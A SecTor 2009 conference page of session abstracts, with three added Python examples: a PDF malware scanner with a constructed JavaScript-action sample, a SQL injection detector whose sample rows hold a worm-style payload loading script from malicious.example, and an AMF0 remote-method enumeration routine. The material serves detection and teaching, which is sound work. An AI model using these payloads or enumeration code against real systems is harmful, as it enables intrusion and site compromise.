
Sessions - 2009

KeyNotes

"The Frogs Who Desired A King: A Virtualization and Cloud Computing Security Fable Set To Interpretive Dance" - Christofer Hoff
"Consumer Internet Identity" - Andrew Nash , Paypal
"A day in the life of a hacker..." - Adam Laurie (Major Malfunction)

Sessions

SecTor 2009 was pleased to present the following:

"Hacking the Privacy Legislation" - Tracy Ann Kosa
"The Past, Present & Future - SQL Injection" - Jerry Mangiarelli
"Portable Document Malware, the Office, and You - Get owned with it, can't do business without it" - Seth Hardy
"Consumerization and Future State of Information Warfare" - Robert "RSnake" Hansen
"Sniper Forensics - Changing the Landscape of Modern Forensics and Incident Response" - Christopher E. Pogue
"The GhostNet Story" - Nart Villeneuve
"Towards a more secure online banking - moving beyond twenty questions" - Nick Owen
"Massively Scaled Security Solutions for Massively Scaled IT" - Michael Smith
"Smashing the stats for fun and profit" - Ben Sapiro
"Malware Freakshow" - Nicholas Percoco and Jibran Ilyas
"Nsploit: Popping boxes with Nmap" - Ryan Linn
"Cain BeEF Hash: Snagging passwords without popping boxes" - Ryan Linn
"Weaponizing the Web: More attacks on User-Generated Content" - Nathan Hamiel and Shawn Moyer
"Game Over, Man: Gamers Under Fire" - Chris Boyd
"When Web 2.0 Attacks - Understanding AJAX, Flash and "Highly Interactive" Technologies" - Rafal Los
"Your Mind: Legal Status, Rights and Securing Yourself" - James Arlen, Tiffany Strauchs Rad
"Crimeware: Web Exploitation Kits Revealed" - Roy Firestein
"To cache a thief | Using database caches to detect SQL Injection attacks" - Kevvie Fowler
"SSLFail.com Panel Discussion" - Jay Graver, Tyler Reguly, Mike Zusman
"Retaliation: Breaking Attack Vectors in the Infrastructure" - Jennifer Jabbusch
"Hacking Big Companies Without Getting Caught" - Joe McCray
"w3af - A framework to own the web" - Andrés Riancho
"Deblaze - A remote method enumeration tool for flex servers" - Jon Rose
"DNSSEC deployment in Canada" - Paul Wouters, Norm Ritchie

Keynotes

Keynote: The Frogs Who Desired A King: A Virtualization and Cloud Computing Security Fable Set To Interpretive Dance - Christofer Hoff

Aesop wrote a little ditty about some discontented frogs who lived in a pond. They asked Zeus for a new King. They got one. It ate them. The moral of this story is "be careful what you wish for as you might just get it." The corresponding analog is that of virtualization and cloud security. It's coming, but it's not going to look much like what security looks like today and it's certainly not what people are expecting. In fact, it may consume us all because we're unprepared for what we're asking for.

 


Keynote: Consumer Internet Identity - Andrew Nash

Andrew Nash, senior director of identity services, PayPal

Consumers have too many online identities: they must remember dozens of accounts and passwords, and consumer Internet interactions are repetitive, frustrating and littered with outdated information. The scale of the problem is immense; hundreds of millions of Internet users interact with tens of millions of Internet service providers daily. We don't have a "network effect in action" for consumer identity, but we need one. The problem is not fundamentally about technology; consumer-managed Internet identity will depend on financial benefit for participants. Identity providers must also be a trusted "assertion provider" or "attribute broker" representing consumers. Andrew will talk about the issue and about current and future solutions. He will also discuss the recent Gov 2.0 initiatives that the US Government is implementing using OpenID providers such as PayPal.

 


Keynote: A day in the life of a hacker... - Adam Laurie (Major Malfunction)

When you check into a hotel room, do you see the elegantly understated, calm yet energising modern styling, providing you with the ultimate in traveller comfort, or is it the hotel safe, pay-per-view TV, automated minibar and RFID door lock that gets your attention? Is the ATM in the lobby a convenient place to collect some cash on the way to your meeting, or a technical challenge waiting to be undertaken? Do the twin turbochargers and double overhead cams on your rental get your attention, or is it the RF-enabled keyfob that has your motor running? Being a hacker in the modern world means never getting from A to B without something catching your eye and making you think, Batman style, "If I can... just.... reverse.... the polarity...".

Will Major Malfunction make it to the podium to deliver this talk, or will the temptations of e-passports, airline ticketing and in-flight entertainment systems prove too much on the way over? Watch this space...

 


Hacking the Privacy Legislation - Tracy Ann Kosa

In today's environment of particularly scarce resources, privacy can be easily buried under its sexier older sister - security. But the need to balance the two is an ongoing concern when it comes to any system that collects, uses and discloses personal information. This session will focus on exploring the differences between the two, and identifying what areas of the privacy legislation are mainly unenforced or unenforceable. In addition, it will identify what people, processes and technical requirements overlap and give you better bang for your compliance dollar.

 


The Past, Present & Future - SQL Injection - Jerry Mangiarelli

SQL Injection has drawn a lot of attention over the last few years, from the TJX and Heartland Payment Systems compromises to the mass SQL Injection attacks of 2008, which have continued to spill over into 2009. What was termed an 'old school attack' has certainly demonstrated the ability to keep succeeding. As we move forward and introduce interactive programming techniques like Flash and Ajax that run on the client, one question must be asked: 'What's next for this old school attack?'

 


Portable Document Malware, the Office, and You - Get owned with it, can't do business without it - Seth Hardy

Many new types of malware, particularly targeted attacks against high-value targets, are using a very effective vector: common document formats such as Word, PowerPoint, and PDF. Unlike executables, businesses can't just block these ubiquitous file types. While there are ways to spot this kind of malware, many antivirus companies are lagging behind with generic detection, making AV evasion simpler than you'd be comfortable with.

We'll start with a high level overview of the file formats for Microsoft Office (Word, Excel, PowerPoint) and PDF, and see how they can be used to distribute malware. Then, we'll take a look at why these formats are difficult to scan using traditional (signature-based) antivirus techniques. Finally, we'll cover effective (heuristic-based, deep inspection) methods for spotting malware which attempts to hide in file formats which can't just be blocked.
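As an added example (not part of the original abstract or the speaker's material), the check below shows why literal signature matching fails against these formats and what a deep-inspection pass has to do instead: decode PDF name escapes (/J#61vaScript is the same name as /JavaScript), inflate FlateDecode streams, and only then look for the action names that make a document execute something. The PDF it scans is constructed inline, and the list of suspicious names is a starting point, not a complete one.

```python
import re
import zlib

# PDF name objects may hex-escape any character as #xx, so /J#61vaScript is the
# same name as /JavaScript. A scanner that matches the literal bytes misses the
# escaped spelling, which is exactly why malicious documents use it.
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Names that turn a document into something that executes or launches content.
SUSPICIOUS_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                    b"/Launch", b"/EmbeddedFile", b"/RichMedia", b"/XFA")

# A flat stream dictionary immediately followed by its stream body.
_STREAM = re.compile(rb"<<((?:(?!<<|>>).)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escaping so obfuscated names compare equal to their plain form."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> list:
    """Return the decoded body of every FlateDecode stream (raw body if inflate fails)."""
    out = []
    for dict_bytes, body in _STREAM.findall(data):
        if b"/FlateDecode" in normalize_names(dict_bytes):
            try:
                out.append(zlib.decompressobj().decompress(body))
            except zlib.error:
                out.append(body)  # a stream that will not inflate is itself worth a look
    return out


def naive_scan(data: bytes) -> int:
    """What a literal-signature check sees: occurrences of the plain string only."""
    return data.count(b"/JavaScript")


def scan_pdf(data: bytes) -> dict:
    """Count suspicious names across the normalized file and its inflated streams."""
    hits = {}
    views = [normalize_names(data)] + [normalize_names(s) for s in inflate_streams(data)]
    for view in views:
        for name in SUSPICIOUS_NAMES:
            # Require a delimiter after the name so /JS does not also count as /JSx.
            n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", view))
            if n:
                hits[name.decode()] = hits.get(name.decode(), 0) + n
    return hits


def build_sample_pdf(malicious: bool = True) -> bytes:
    """Constructed test input, not a real-world sample. The malicious variant has an
    /OpenAction whose action type is /J#61va#53cript (escaped /JavaScript) and keeps
    the script body in a FlateDecode stream so it never appears in the file as text."""
    objs = [b"<< /Type /Catalog /Pages 2 0 R" + (b" /OpenAction 4 0 R" if malicious else b"") + b" >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>"]
    if malicious:
        script = b"app.alert('the real thing would drop an exploit here');"
        packed = zlib.compress(script)
        objs += [b"<< /Type /Action /S /J#61va#53cript /JS 5 0 R >>",
                 b"<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(packed)
                 + packed + b"\nendstream"]
    pdf = b"%PDF-1.4\n"
    for i, obj in enumerate(objs, 1):
        pdf += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%EOF\n"
```

Against the constructed file, naive_scan returns 0 while scan_pdf reports /OpenAction, /JavaScript and /JS, and inflate_streams hands the analyst the script text. Real documents add object streams, multiple filters and string-level obfuscation inside the script itself, so treat this as the first layer of a deeper inspection, not the whole of it.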

 


Sniper Forensics - Changing the Landscape of Modern Forensics and Incident Response - Christopher E. Pogue

Live Analysis tools and techniques have exploded onto the incident response scene in the last two years. By gathering and reviewing volatile data and RAM dumps, incident responders can use time-proven theories like Locard's Exchange Principle, Occam's Razor and the Alexiou Principle to target only the systems that are part of the breach. What used to take hours of analysis can now be done in minutes! What used to take weeks can now take days!

By using sound logic and data reduction based on forensic evidence extracted from Live Analysis, incident responders can introduce accuracy and efficiency into their case work at a level not available through any other means. This is truly the cutting edge of modern computer forensics, and not something to be taken lightly! Don't miss the opportunity to learn tips, tools, and hear real world examples of how Live Analysis is literally changing the landscape of modern forensics!

 


Consumerization and Future State of Information Warfare - Robert "RSnake" Hansen

People crave constant communication, instant gratification, ease, and fun. But at what cost? What doors are we opening for an eventual potential for government sponsored espionage, terrorism or full scale war? How are consumers enabling or even participating in this effort? This speech will cover how individuals in a highly commercialized world can bring a nation state to the brink of civil/international war... or beyond.

 


The GhostNet Story - Nart Villeneuve

In March 2009 researchers at the University of Toronto uncovered a network of over 1200 compromised computers spread across 103 different countries. Nearly 30% of the infected hosts were identified as high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. This presentation will detail the GhostNet investigation from the field work at Tibetan institutions in Dharamsala, India through to the discovery of the attackers' command and control interface and the aftermath including the victim notification process. Throughout the talk I will explore alternative explanations and address some of the misconceptions surrounding the GhostNet report.

 


Towards a more secure online banking - moving beyond twenty questions - Nick Owen

Online financial applications have developed in a seemingly haphazard way. The result is images for host authentication, hidden cookies and inane questions. The session will break down attacks against session, host/mutual authentication and transaction authentication, suggest more secure methods of protecting against those attacks without excessive inconvenience to the user, and lay the groundwork for additional security. We will present a multi-layered approach that authenticates the user's session, hardens the browser, strongly authenticates the server and can authenticate transactions without forcing the user to play 20 questions. Session themes will include keeping the user interface simple and consistent; the latest tools that could lead to new attack vectors, such as low-cost VoIP war-dialers; and where reliance on third parties can create unintended consequences. For example, out-of-band authentication is becoming increasingly popular, but some implementations rely on third parties that protect their own accounts by insecure means, negating the security benefits and increasing the likelihood of an attack on that third-party service. We will discuss the impact of this and how the divergent economic incentives of cell carriers impact the security of SMS-based authentication systems.

 


Massively Scaled Security Solutions for Massively Scaled IT - Michael Smith

The US Federal Government is the world's largest consumer of IT products and, by extension, one of the largest consumers of IT security products and services. This talk covers some of the problems with security on such a massive scale; how and why some technical, operational, and managerial solutions are working or not working; and how these lessons can be applied to smaller-scale security environments.

 


Smashing the stats for fun and profit - Ben Sapiro

(or how to convince your boss to spend properly on security) We all know that security vulnerabilities need to be fixed but it can be hard to convince your employer that you deserve a budget so you can do your job properly.

Using research from the 2009 Canada wide security survey, we'll explore (FUD Free) the following topics:

* Do Canadian businesses think cloud services are secure?
* Do people still forget about application security?
* Which approaches work in getting the business to understand security issues?
* How much should your employer spend on security?

 


Malware Freakshow - Nicholas Percoco and Jibran Ilyas

In 2008 alone, we performed full forensic investigations on over 150 different environments ranging from financial institutions, hotels, restaurants and casinos. This presentation will show the inner workings of 4 very interesting pieces of malware, ranging from somewhat simple to very complex. Each sample was actually used to steal confidential data that resulted in significant fraud and business loss for the organizations we found them at. Many of the pieces of malware we have been running across are advanced pieces of software written by very skilled developers. The complexity in their propagation, control channels, and data exporting properties will be very interesting to anyone interested in this topic.

 


Weaponizing the Web: More attacks on User-Generated Content - Nathan Hamiel and Shawn Moyer

Ultimately, basing the value proposition of your site on user-generated and external content is a kind of variant on Russian Roulette, where in every turn the gun is pointed at your head, regardless of the number of players. You may win most of the time, but eventually a bullet is going to find its way into the chamber with your name on it.

We spent some time last year looking at this problem as it related specifically to Social Networks, but that left a lot of the territory unexplored (and plenty of other folks are looking at SocNets at this point). This time around we'll be talking about a previously unnoticed attack vector for lots and lots of web applications with user-generated content, and releasing a handy tool to exploit it.

Bundled in are some thoughts on Web 2.0 attack surface, a few new exploitation techniques, and as in last year, a hefty helping of lulz, ridicule, and demos-of-shame at the expense of a few of your and (our) favorite sites.

 


Nsploit: Popping boxes with Nmap - Ryan Linn

Tired of waiting on scans to complete so you can own boxes? Maybe we can help! Let the powerful scripting engine in Nmap and the sexy attack power of Metasploit combine to form Nsploit, a framework for launching Metasploit exploits from Nmap. Nmap now supports more vulnerability detection out of the box. Nsploit leverages that power and takes it one step further, allowing vulnerability triggers to initiate Metasploit exploits. This talk will show you how the framework works and how exploit developers can leverage it to create their own vulnerability triggers.

Cain BeEF Hash: Snagging passwords without popping boxes - Ryan Linn

Chaining exploits and abusing trust are two heavily discussed topics in security today. If you ever deal with Windows domains come see what tools and techniques can be used to quietly liberate hashes even if the workstations are patched. This presentation will go in depth into what tools can facilitate turning acquired credentials into usable passwords quickly. Once the demonstrations are finished, there will be explanations of techniques and policies that can be used to mitigate and reduce the impact of these types of attacks.

 


Game Over, Man: Gamers Under Fire - Chris Boyd

An exploration of security issues relating to consoles and their risks to both home users and the business environment. This will include issues such as custom built DDoS tools, social engineering of Microsoft support staff, account theft, the risk to businesses and personal tips to keep your own details secure. I will also examine the trade of stolen Xbox accounts in return for credit cards, how the rewards that companies give gamers make them targets because of the inadequate privacy features and how free programs allow hackers to exploit profanity filters, paid content and even the profiles themselves.

 


When Web 2.0 Attacks - Understanding AJAX, Flash and "Highly Interactive" Technologies - Rafal Los

This talk covers the problems that are emerging with Web 2.0 technologies, why they are issues and what can be done. Specifically, it dives into the approach for analyzing AJAX and Flash applications using commercial and open-source tools; the talk is part informative, part educational, and all practical. Conference attendees love to have something to take back to their management and teams to show that they've learned something, and this talk provides exactly that.

 


Your Mind: Legal Status, Rights and Securing Yourself - James Arlen and Tiffany Strauchs Rad

As a participant in the information economy, you no longer exclusively own material originating from your organic brain; you leave a digital trail with your portable device's transmitted communications and when your image is captured by surveillance cameras. Likewise, if you Tweet or blog, you have outsourced a large portion of your memory and some of your active cognition to inorganic systems. U.S. and international laws relating to protection of intellectual property and criminal search and seizure procedures put into question the protections of these ephemeral communications and memoranda stored on your personal computing devices, in cloud computing networks, on off-shore "subpoena proof" server/jurisdiction-hopping platforms, or on social networking sites. Once considered futuristic, these technologies are now here: as we move our ideas and memories onto external devices, or are subjected to public surveillance by systems such as Future Attribute Screening Technology that assess "pre-crime" intent by remotely measuring biometric data such as heart rate, body temperature, pheromone responses and respiration, where do our personal privacy rights over our thoughts end and become public expressions with lesser legal protection? Similarly, at what point does data in transit to, or stored in, implantable medical devices continuously connected to the Internet become searchable? In a society in which there is little differentiation remaining between self/computer, thoughts/stored memoranda, and international boundaries, a technology lawyer/computer science professor and a security professional will recommend propositions to protect your data and yourself.

 


Crimeware: Web Exploitation Kits Revealed - Roy Firestein

The session introduces the attendee to how crimeware has become increasingly popular in recent years, its striking similarities to legitimate business, and the dangers the Internet community is facing. There will also be a live demonstration of the infamous MPack kit (or a similar kit), including a short exercise encouraging attendees to identify methods to mitigate or detect such scenarios.

 


To cache a thief | Using database caches to detect SQL Injection attacks - Kevvie Fowler

Most SQL Injection attack detection methods are heavily dependent on IDS and web server logging which in many scenarios can be easily circumvented. Performing SQL Injection attack detection at the database can overcome current detection limitations. This session will demonstrate techniques and a new incident response tool that uses database caches to confirm or discount the occurrence of a successful SQL injection attack including:

  • attacks unveiled at this year's Black Hat Europe conference

  • attacks launched from the tool used to compromise the website of a major anti-virus vendor earlier this year

  • the attack used by the SQL Injection worm that compromised over 500,000 websites in 2008

We'll close by looking at how you can proactively configure your database server to automatically detect and alert you of successful SQL injection attacks.

The focus of this session will be on Microsoft SQL Server however the same principles can be applied to other RDBMS products. This is a must attend session for anyone tasked with securing, investigating or working with database servers and web-based applications.
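The approach the abstract describes, as an added example that is not the speaker's tool: the T-SQL below reads statement text out of SQL Server's plan cache (sys.dm_exec_query_stats and sys.dm_exec_sql_text are the standard DMVs available since SQL Server 2005), and the Python triage runs injection heuristics over the returned rows, including decoding the CAST(0x... AS NVARCHAR) literal that the 2008 mass-injection worm used to hide its real statement from pattern matching. The cache rows, table names and the malicious.example host are constructed for this example; the rules are a starting set to tune against your own application's normal query text.

```python
import re

# Pulls the text of statements SQL Server still holds in its plan cache (SQL Server
# 2005 and later), newest first. Run it on the database server: the cache records what
# actually executed, whether or not the web tier or an IDS saw the request intact.
PLAN_CACHE_QUERY = """
SELECT TOP (1000) qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
ORDER BY qs.last_execution_time DESC;
"""

# CAST(0x... AS [N]VARCHAR(n)) is how the 2008 worm hid its statement: the hex is
# UTF-16LE for NVARCHAR and single-byte for VARCHAR.
_HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.I)

RULES = [
    ("union-select",        re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I)),
    ("tautology",           re.compile(r"\bOR\s+(?:'[^']*'\s*=\s*'[^']*'|\d+\s*=\s*\d+)", re.I)),
    ("comment-terminator",  re.compile(r"'\s*(?:--|/\*)|--\s*$")),
    ("stacked-statement",   re.compile(r";\s*(?:EXEC|EXECUTE|DECLARE|DROP|INSERT|UPDATE|SHUTDOWN)\b", re.I)),
    ("xp_cmdshell",         re.compile(r"\bxp_cmdshell\b", re.I)),
    ("hex-encoded-payload", _HEX_CAST),
    ("stored-script-tag",   re.compile(r"<script\b", re.I)),  # what the 2008 worm wrote into text columns
]


def decode_hex_casts(statement: str) -> list:
    """Decode every CAST(0x... AS [N]VARCHAR) literal to the SQL it hides."""
    out = []
    for m in _HEX_CAST.finditer(statement):
        raw = bytes.fromhex(m.group(1))
        enc = "utf-16-le" if m.group(2).upper() == "N" else "latin-1"
        out.append(raw.decode(enc, errors="replace"))
    return out


def analyze(statement: str, depth: int = 0) -> dict:
    """Map rule name -> matched text; decoded hex payloads are analyzed recursively."""
    findings = {}
    for name, rx in RULES:
        m = rx.search(statement)
        if m:
            findings[name] = m.group(0)
    if depth < 3:  # a payload can itself carry another CAST layer; bound the recursion
        for payload in decode_hex_casts(statement):
            inner = analyze(payload, depth + 1)
            if inner:
                findings.setdefault("decoded", []).append({"payload": payload, "findings": inner})
    return findings


def triage(rows) -> list:
    """rows: (last_execution_time, execution_count, text) tuples as PLAN_CACHE_QUERY returns them."""
    flagged = []
    for ts, count, text in rows:
        findings = analyze(text)
        if findings:
            flagged.append({"time": ts, "executions": count, "text": text, "findings": findings})
    return flagged


def _hex_literal(sql: str, wide: bool = True) -> str:
    return (sql.encode("utf-16-le") if wide else sql.encode("latin-1")).hex().upper()


# Constructed cache rows, not real data. Row 3 follows the shape of the 2008 worm's
# injection; the inner statement and the host name are invented for this example.
WORM_INNER = ("UPDATE Products SET Description=RTRIM(CONVERT(VARCHAR(4000),Description))"
              "+'<script src=http://malicious.example/x.js></script>'")
SAMPLE_ROWS = [
    ("2009-10-06 09:14:02", 311, "SELECT ProductID, Name FROM Products WHERE CategoryID = 7"),
    ("2009-10-06 09:15:40", 1,   "SELECT Name FROM Products WHERE ProductID = 1 UNION SELECT name FROM sys.tables--"),
    ("2009-10-06 09:16:05", 1,   "DECLARE @S NVARCHAR(4000);SET @S=CAST(0x" + _hex_literal(WORM_INNER)
                                 + " AS NVARCHAR(4000));EXEC(@S);--"),
    ("2009-10-06 09:16:30", 58,  "EXEC dbo.GetProduct @ProductID = 42"),
]
```

triage(SAMPLE_ROWS) flags rows 2 and 3 and leaves the two legitimate statements alone; for row 3 the decoded payload exposes the script tag that the hex literal was hiding. The plan cache is volatile (restarts, memory pressure and DBCC FREEPROCCACHE all clear it), so on a live incident pull it before anything else and preserve the output.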

 


SSLFail.com Panel Discussion - Jay Graver, Tyler Reguly and Mike Zusman

SSLFail.com brings together security enthusiasts who research all things SSL/TLS. Secure Sockets Layer and Transport Layer Security are an essential part of today's Internet, yet they are very poorly understood by most users and, unfortunately, by many administrators. There have been a number of very important developments in the area of SSL in the past year: the user's security experience has completely changed, while at the same time the Certificate Authorities have invented new products to revitalize their profits. There are dozens of ways that SSL can go horribly wrong for both the users and the administrators of today's Internet.

The panel will discuss their latest areas of SSL research, explain the current (and newly released) attacks on SSL and the steps that Administrators and Users can do to protect themselves. Questions from the audience will be welcome as this is an interactive panel discussion.

 


Retaliation: Breaking Attack Vectors in the Infrastructure - Jennifer Jabbusch

2010 will mark the beginning of a new world of network and infrastructure security, as new IEEE standards change the threat models for wired, wireless and wide area networks. Learn how to use these features to stop spoofing, eavesdropping and a host of other malicious activity. I'll give you the knowledge and tools to fight back, secure the network, thwart attackers, prevent data leakage and more. Among other things, this session covers the new MACsec encryption, key exchange, network advertisements and unique device identity (IEEE 802.1X-REV, 802.1AE, 802.1af, 802.1AR).

 


 

w3af - A framework to own the web - Andrés Riancho

Specially crafted for SecTor's attendees, the w3af project leader will deliver a double talk about the framework, guiding you through its features using demos and real-life examples.

The first session introduces w3af to the audience and shows all of the automated Web application scanning features, then follows up with a detailed description of the advanced exploitation features present in the framework. A must-see talk if you're a penetration tester wanting to learn new tricks.

The second session starts with an introduction to the new tools that have been integrated into w3af's GUI to help Web application penetration testers, and ends with a comparison between four commercial and open source Web application scanners. This analysis includes the different ways in which the HTTP fuzzers and HTML parsers work in each scanner.

While we recommend you attend both sessions, it is possible to attend the second session without attending the first one.

 


Deblaze - A remote method enumeration tool for flex servers - Jon Rose

Flash has traditionally been a graphics-heavy technology used to create artistic user interfaces that run in a client's browser. The evolution of Flash was pushed by application developers who wanted to access complex business logic and functionality on remote servers. Through the use of the Flex programming model and the ActionScript language, Flash Remoting was born. Now Flash applications can make requests to a remote server to call server-side functions, such as looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. This talk will describe how Flash Remoting works, the technologies that implement it, and the potential security problems related to Flash Remoting. A proof-of-concept tool, deblaze, will demonstrate how these remote methods can be attacked. Currently, there are no publicly available tools that are able to perform method enumeration and interrogation from a zero-knowledge perspective.
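How a Flash Remoting call looks on the wire, as an added example that is not the Deblaze tool's code: the packet layout and type markers follow Adobe's published AMF0 specification (version 0 header, target URI such as Service.method, response URI, body length, then an AMF0 strict array of arguments), and the enumeration loop sends one call per candidate method name and treats any reply other than a "not found" status as proof that the method exists, which is what zero-knowledge enumeration relies on. The EchoService name, the fake_gateway stand-in and its "Method ... not found" wording are assumptions so the example runs offline; a real gateway's error text and status codes differ by product, so check what yours returns before keying on it.

```python
import struct

# AMF0 type markers used by a remoting call and its reply (Adobe AMF0 specification).
NUMBER, BOOL, STRING, OBJECT, NULL, UNDEFINED, STRICT_ARRAY = 0x00, 0x01, 0x02, 0x03, 0x05, 0x06, 0x0A
OBJECT_END = b"\x00\x00\x09"


def _utf8(s: str) -> bytes:
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def _read_utf8(buf: bytes, pos: int):
    n = struct.unpack(">H", buf[pos:pos + 2])[0]
    return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n


def encode_value(v) -> bytes:
    """Serialize a Python value as an AMF0 value (the subset a remoting call needs)."""
    if v is None:
        return bytes([NULL])
    if isinstance(v, bool):  # bool before int: bool is an int subclass
        return bytes([BOOL, int(v)])
    if isinstance(v, (int, float)):
        return bytes([NUMBER]) + struct.pack(">d", float(v))
    if isinstance(v, str):
        return bytes([STRING]) + _utf8(v)
    if isinstance(v, (list, tuple)):
        return bytes([STRICT_ARRAY]) + struct.pack(">I", len(v)) + b"".join(map(encode_value, v))
    if isinstance(v, dict):
        return bytes([OBJECT]) + b"".join(_utf8(k) + encode_value(x) for k, x in v.items()) + OBJECT_END
    raise TypeError(f"cannot encode {type(v).__name__}")


def decode_value(buf: bytes, pos: int):
    """Parse one AMF0 value at buf[pos]; returns (value, new_pos)."""
    marker, pos = buf[pos], pos + 1
    if marker == NUMBER:
        return struct.unpack(">d", buf[pos:pos + 8])[0], pos + 8
    if marker == BOOL:
        return bool(buf[pos]), pos + 1
    if marker == STRING:
        return _read_utf8(buf, pos)
    if marker in (NULL, UNDEFINED):
        return None, pos
    if marker == STRICT_ARRAY:
        n, pos, items = struct.unpack(">I", buf[pos:pos + 4])[0], pos + 4, []
        for _ in range(n):
            item, pos = decode_value(buf, pos)
            items.append(item)
        return items, pos
    if marker == OBJECT:  # (key, value) pairs until the empty key + 0x09 end marker
        obj = {}
        while True:
            key, pos = _read_utf8(buf, pos)
            if key == "" and buf[pos] == 0x09:
                return obj, pos + 1
            obj[key], pos = decode_value(buf, pos)
    raise ValueError(f"unsupported AMF0 marker 0x{marker:02x}")


def build_packet(target: str, response_uri: str, body) -> bytes:
    """AMF0 packet: version 0, zero headers, one message (target, response URI, length, body)."""
    enc = encode_value(body)
    return struct.pack(">HHH", 0, 0, 1) + _utf8(target) + _utf8(response_uri) + struct.pack(">I", len(enc)) + enc


def parse_packet(buf: bytes) -> list:
    """Return [(target, response_uri, body), ...] for a headerless AMF0 packet."""
    version, nheaders, nmsgs = struct.unpack(">HHH", buf[:6])
    if version != 0 or nheaders != 0:
        raise ValueError("only headerless AMF0 packets are handled here")
    pos, msgs = 6, []
    for _ in range(nmsgs):
        target, pos = _read_utf8(buf, pos)
        response, pos = _read_utf8(buf, pos)
        pos += 4  # declared body length; may be 0xFFFFFFFF ("unknown"), so parse the body instead
        body, pos = decode_value(buf, pos)
        msgs.append((target, response, body))
    return msgs


def classify_reply(packet: bytes) -> str:
    """'exists' on onResult; on onStatus, tell a missing method from one that exists but failed."""
    target, _, body = parse_packet(packet)[0]
    if target.endswith("/onResult"):
        return "exists"
    desc = body.get("description", "") if isinstance(body, dict) else ""
    return "missing" if "not found" in desc.lower() else "error"


def enumerate_methods(service: str, candidates, send) -> list:
    """send(request_bytes) -> reply_bytes. Any verdict other than 'missing' means the method exists."""
    found = []
    for method in candidates:
        verdict = classify_reply(send(build_packet(f"{service}.{method}", "/1", [])))
        if verdict != "missing":
            found.append((method, verdict))
    return found


def fake_gateway(request: bytes) -> bytes:
    """Offline stand-in for a remoting endpoint, constructed for this example; the
    'Method ... not found' wording is an assumption, not any product's real message."""
    target, response_uri, _ = parse_packet(request)[0]
    method = target.rsplit(".", 1)[-1]
    if method in ("echo", "getAccounts"):
        return build_packet(response_uri + "/onResult", "null", {"ok": True})
    status = {"level": "error", "code": "Server.ResourceUnavailable", "description": f"Method '{method}' not found"}
    return build_packet(response_uri + "/onStatus", "null", status)
```

Pointing enumerate_methods at a real gateway means replacing fake_gateway with an HTTP POST of the packet (content type application/x-amf) and returning the response body. The defensive reading is the same as for any RPC surface: every method the gateway will dispatch is reachable whether or not the SWF ever calls it, so authorization belongs on the server side of each method.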

 


DNSSEC deployment in Canada - Paul Wouters, Norm Ritchie

The Kaminsky bug, announced at Black Hat last year, sent everyone scrambling to update their DNS infrastructure. But most people stopped after the patchwork. Over 10 TLDs, including .gov, have already deployed DNSSEC. CIRA has launched a "friends & family" test program for those who want to test DNSSEC with .ca domains (and it should be in full production by the time of SecTor). Why are you not using the added security provided by DNSSEC?

This presentation will show you how to take advantage of DNSSEC within minutes. It will show you how to do the minimum to protect your .ca domain against cache poisoning. And for those who only care about their .com domain, DNSSEC Lookaside Validation (DLV) will be demonstrated.

The presentation will include a live demo configuring DNSSEC on stock Windows and Linux machines and a demo deploying DNSSEC on a .ca domain.

 

 

Sponsors

Gold: Sentry Metrics, Qualys, Symantec, Trustwave, Rapid7
Bronze: Risk IO
Industry: Toronto Area Security Klatch